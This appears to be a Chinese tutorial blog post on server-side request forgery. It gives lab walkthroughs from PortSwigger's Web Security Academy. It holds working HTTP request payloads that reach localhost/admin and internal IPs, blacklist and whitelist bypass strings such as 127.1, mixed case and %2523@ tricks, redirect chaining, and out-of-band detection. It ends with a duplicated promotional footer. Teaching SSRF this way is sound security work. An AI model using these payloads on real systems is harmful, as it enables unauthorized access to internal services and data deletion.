stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1
后端服务器查询结果后,将信息状态和数量返回给用户。但攻击者可尝试利用此点构造针对服务器自身的SSRF攻击,如下:
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
stockApi=http://localhost/admin
后端服务器会获取/admin
的页面,并将内容返还给用户。
正常情况下,攻击者直接访问`/admin`,因访问权限控制会被拒绝。但是服务器访问自身系统上运行的业务/admin页面,往往不受限制。就这样攻击者就简单的绕过了安全防护。这是SSRF最标准的攻击流程。
>
> 例题 1
>
>
>
>
> 在这种信任关系中,来自本地计算机的请求的处理方式与普通请求不同。基于如下几点因素,使后端存在这种信任关系。
>
>
> * 访问控制检查可能都在前面的不同组件中实现。与服务器本身建立连接时,检查被绕过
> * 出于灾难恢复的目的,应用程序可能允许来自本地计算机的任何用户在不登录的情况下进行管理访问。 当然这种情况的前提是, 只有完全受信任的用户才会直接使用服务器本身。而攻击就是要打破这种种的假设前提。
> * 管理接口与主应用程序使用不同的端口号,因此对面向用户的端口设置了防护。但忽略了管理接口的防护。
>
>
>
#### 2.2 针对后端其他系统的攻击
服务器能够与用户不能直接访问的其他后端系统交互。 通常这些后端系统使用外部不可以路由到的内网IP,所以安全防护比较薄弱。继续用上面的例子举例,如果/admin业务不在本地服务器,而是在另一台内网机器上(192.168.0.68),攻击荷载可改为
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
stockApi=http://192.168.0.68/admin
>
> 例题 2
>
>
>
### 3. 绕过常规的SSRF防御
#### 3.1 基于黑名单过滤的绕过
黑名单往往对127.0.0.1、localhost或类似/admin等敏感url进行过滤。绕过方法如下:
* 127.0.0.1的变形写法`127.1` `2130706433` `017700000001`
* 注册自己的域名,解析为127.0.0.1 可使用spoofed.burpCollaborator.net实现
* 敏感路径可使用`大小写混用/AdmIn``重写/adadminmin`混淆被过滤的字符串
>
> 例题 3
>
>
>
#### 3.2 基于白名单匹配的绕过
一些网站采用白名单进行匹配,命中的URL可通过。有时可测试包含白名单开头,或部分来匹配。主要还是利用对URL解析的不一致来绕过白名单,尤其是URL规范中常备忽略的功能。
* URL路径中使用@,前面表示登陆账户凭据
`https://expected-host@evil-host`
* URL路径中使用#,表示url锚点或片段
`https://evil-host#expected-host`
* 利用DNS命名层次结构
`https://expected-host.evil-host`
* 对URL部分进行URL编码以混淆解析
* 上述多种方式的混合使用
>
> 例题 4
>
>
>
#### 3.3 利用重定向绕过过滤
有时上面介绍的各种方法均不成功,可尝试查找目标应用中,是否可使用重定向绕过防护。示例如下:
`/product/nextProduct?currentProductId=6&path=http://evil-user.net`
网站解析支持重定向,解析结果为
`http://evil-user.net`
完整的SSRF攻击包实例如下:
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
stockApi=http://weliketoshop.net/product/nextProduct?currentProductId=6&path=http://192.168.0.68/admin
>
> 例题 5
>
>
>
#### 3.4 盲注SSRF漏洞利用
原理与上面介绍的相同,唯一不同点就是响应结果,不再通过响应包返回至用户。导致无法直接获取敏感数据,或执行进一步的攻击。
* 使用外带技术(OAST)探测发现盲注SSRF漏洞
原理是,激发内网服务器向外部攻击者控制的域名发送HTTP请求,监控控制的域名下所有的流量,寻找是否有目标内网的交互。若存在,则证明存在SSRF潜在漏洞。
推荐使用工具Burp Collaborator,随机生成被使用者完全监测的域名,完成上述测试。
* 利用DNS lookup获取敏感信息
在控制的域名下插入子域名DNS lookup命令。一般内网会禁止服务器对外的任意网络链接,但往往会允许DNS流量通过(基础设施往往需要DNS服务),
>
> 例题 6
>
>
>
利用此种方法探测服务器本身或其他后端系统上的其他漏洞。您可以扫描内部IP地址空间,发送旨在检测已知漏洞的有效负载。如果这些有效负载还采用带外技术,那可能会在未打补丁的内部服务器上发现漏洞。
>
> 例题 7
>
>
>
### 4. 漏洞实例
#### 1. 针对服务器自身的基本SSRF攻击([Basic SSRF against the local server](https://bbs.csdn.net/topics/618545628))
* **目标**
通过修改库存查询的URL,访问到只有管理员才能访问的http://localhost/admin路径模块,并删除用户carlos
* **解题思路**
1. 在查询库存量的流程中,发现数据包
POST /product/stock HTTP/1.1
Host: 0a03009503626052c08518b500aa008d.web-security-academy.net
stockApi=http%3a%2f%2flocalhost%2fadmin%2fdelete%3fusername%3dcarlos
2. 改下`stockApi=http%3a%2f%2flocalhost%2fadmin`得到在响应中发现/admin页面已返回,发现删除账户链接。
`<a href="/admin/delete?username=carlos">`
3. 接着构造数据包
POST /product/stock HTTP/1.1
Host: 0a03009503626052c08518b500aa008d.web-security-academy.net
stockApi=http%3a%2f%2flocalhost%2fadmin%2fdelete%3fusername%3dcarlos
#### 2. 针对其他后端系统的基本SSRF攻击([Basic SSRF against another back-end system](https://bbs.csdn.net/topics/618545628))
* **目标**
通过修改库存查询的URL,扫描192.168.0/24网段的8080端口,删除用户carlos
* **解题思路**
1. 根据提示,将数据包`POST /product/stock`在192.168.0/24网段进行暴力破解,发现路径http://192.168.0.246:8080/admin
![在这里插入图片描述](https://img-blog.csdnimg.cn/d3662ebc94944e528227b839fd705547.png)
后续操作与上题一致
#### 3. 使用SSRF攻击绕过黑名单的过滤([SSRF with blacklist-based input filter](https://bbs.csdn.net/topics/618545628))
* **目标**
通过修改库存查询的URL,访问到只有管理员才能访问的http://localhost/admin路径模块,并删除用户carlos
网站有SSRF安全防护需绕过
* **解题思路**
与第1题完全一样,仅是对localhost /admin有过滤限制,可使用大小写绕过。
`http://lOcAlHoSt/AdMin`
#### 4. 使用SSRF攻击绕过白名单的匹配([SSRF with whitelist-based input filter](https://bbs.csdn.net/topics/618545628))
* **目标**
通过修改库存查询的URL,访问到只有管理员才能访问的http://localhost/admin路径模块,并删除用户carlos
网站有SSRF安全防护需绕过
* **解题思路**
1. 根据前文讲解,先测试@ 发现`http://username@stock.weliketoshop.net`,发生内部错误,证明未被过滤而是被解析。证明@后路径可被恶意利用。
2. 测试# 发现只有结合双重url编码#时(%2523)有效,证明%2523前路径可被恶意利用
3. 经多次测试,发下`http://localhost:80%2523@stock.weliketoshop.net/admin`实际解析到了 http://localhost:80/admin
4. 至此构造删除carlos的ssrf路径`http://localhost:80%2523@stock.weliketoshop.net/admin/delete?username=carlos`
![img](https://img-blog.csdnimg.cn/img_convert/28292197baf0e1910706c8b1547b3257.png)
![img](https://img-blog.csdnimg.cn/img_convert/3f1f48c2831c9127c67dd7b297b67f46.png)
**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
**[需要这份系统化资料的朋友,可以戳这里获取](https://bbs.csdn.net/topics/618545628)**
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
1714799976464)]
[外链图片转存中...(img-uORlsRh0-1714799976464)]
**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
**[需要这份系统化资料的朋友,可以戳这里获取](https://bbs.csdn.net/topics/618545628)**
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**